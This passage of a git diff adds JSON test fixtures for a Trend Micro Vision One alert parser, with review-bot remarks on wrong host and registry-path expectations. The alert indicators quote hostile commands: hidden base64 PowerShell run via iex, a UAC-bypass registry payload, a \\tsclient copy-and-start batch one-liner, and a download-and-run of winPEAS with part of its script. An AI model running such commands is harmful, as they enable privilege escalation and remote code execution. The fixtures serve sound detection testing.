Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Process Injection from Windows Temporary Location to System32",
+ "type": [
+ "info"
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3"
+ },
+ "@timestamp": "2024-07-23T07:49:48Z",
+ "host": {
+ "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299",
+ "ip": [
+ "19.112.87.74"
+ ],
+ "name": "CHTX-XMEDICA-2K12.windows10.local"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "SesProbe-31944.exe ",
+ "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe",
+ "hash": {
+ "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+ "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303"
+ },
+ "parent": {
+ "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S",
+ "executable": "C:\\Windows\\System32\\cmd.exe",
+ "hash": {
+ "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ }
+ },
+ "pid": 5552
+ },
+ "related": {
+ "hash": [
+ "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+ "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303",
+ "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ ],
+ "ip": [
+ "19.112.87.74"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Process Injection from Windows Temporary Location to System32"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "incident_id": "IC-14558-20240722-00000",
+ "investigation_status": "New",
+ "severity": "medium",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "windows10",
+ "id": "windows10\\jdoe",
+ "name": "jdoe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
new file mode 100644
index 000000000..6598afe24
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
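Review bot: The expected `host` block (`id` 7E8FDBEF-…, `name` CHTX-XMEDICA-2K12.windows10.local, `ip` 19.112.87.74) is the first host entity in `impactScope.entities`, which carries provenance `Sweeping` only and matches just indicators 1, 5 and 7, whereas the `SesProbe-31944.exe` process, its hashes, the `windows10\jdoe` account and indicator 18 all relate solely to `E991724A-…` (PRESTATAIR-2K19, 1.231.184.40, provenance `Sweeping` and `Alert`). The fixture therefore pins `host.*` and `related.ip` to a machine where only the sweep hit, so an analyst pivoting on the normalized event would investigate the wrong endpoint. If the parser indeed takes the first host entity, it should prefer the host whose `provenance` contains `Alert` (or the one named in the account's `relatedEntities`), with the expectation becoming `"id": "E991724A-42D2-44F9-B122-40290A2E9E15"`, `"name": "PRESTATAIR-2K19"`, `"ip": ["1.231.184.40"]`. Separately, `process.pid: 5552` is taken from indicator 19 (`objectPid`), the pid of the injection target `gpresult.exe`, not of the `SesProbe-31944.exe` process whose path and hashes fill the rest of `process.*`; it should move to a target-process field or be dropped from the expectation. The parser that produces these values is not part of this diff, so this is a note on what the fixture asserts rather than on the parser code.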
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": 
\"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": 
\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": 
\"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], 
\"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": 
\"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP 
-NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x",
+ "type": "REG_SZ"
+ },
+ "hive": "hkcr",
+ "key": "ms-settings\\shell\\open\\command",
+ "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute",
+ "value": "delegateexecute"
+ },
+ "related": {
+ "ip": [
+ "10.10.58.51"
+ ],
+ "user": [
+ "sam"
+ ]
+ },
+ "rule": {
+ "name": "Privilege Escalation via UAC Bypass"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-9002-20220906-00022",
+ "case_id": "CL-1-20230706-00001",
+ "incident_id": "IC-1-20230706-00001",
+ "investigation_status": "New",
+ "severity": "high",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "shockwave",
+ "email": "support@pctutordetroit.com",
+ "id": "shockwave\\sam",
+ "name": "sam"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
new file mode 100644
index 000000000..a9a7d3d7c
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
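Review bot: The expected `registry.path` in this fixture repeats the key — `hkcr\ms-settings\shell\open\command\hkcr\ms-settings\shell\open\command\delegateexecute` — because the input carries the same `registry_key` value twice (indicators 5 and 6, one per matched filter) and the expectation pins the concatenation instead of the real path. The line should read `"path": "hkcr\\ms-settings\\shell\\open\\command\\delegateexecute"`, with the parser de-duplicating `registry_key` indicators before it joins hive, key and value; as written the test locks in a malformed path that defeats any rule or pivot keyed on `registry.path`. `registry.data.type` is pinned to `REG_SZ` although the input has no value-type field, so it presumably comes from the parser and would mislabel non-string data; that assumption belongs in the parser's documentation rather than being frozen here. The `user.email` expectation takes `support@pctutordetroit.com` from an `emailAddress` entity whose `relatedEntities` is empty, so it is not linked to the `shockwave\sam` account and attaching it to `user.*` conflates two impact-scope entities.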
@@ -0,0 +1,75 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", 
\"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | 
Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n 
